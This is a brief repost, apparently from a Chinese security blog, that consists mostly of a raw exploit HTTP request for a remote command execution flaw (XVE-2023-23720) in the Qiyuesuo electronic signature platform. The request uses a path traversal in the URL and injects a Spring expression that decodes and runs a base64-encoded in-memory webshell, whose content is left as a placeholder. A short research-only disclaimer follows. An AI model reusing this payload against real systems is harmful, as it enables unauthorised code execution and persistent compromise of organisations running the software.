POST /captcha/%2e%2e/template/html/add HTTP/1.1Host: xxxAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 16398{"file":"abc","title":"abc","params":[{"extensionParam":"{"expression":"var a=new org.springframework.expression.spel.standard.SpelExpressionParser();var b='base64 编 码 后 的 内 存 马 ';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-8');var c=a['parseExpression'](deStr);c.getValue();"}","name":"test"}]}
原文始发于微信公众号(左逆安全攻防):契约锁电子签章平台远程命令执行漏洞(XVE-2023-23720)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论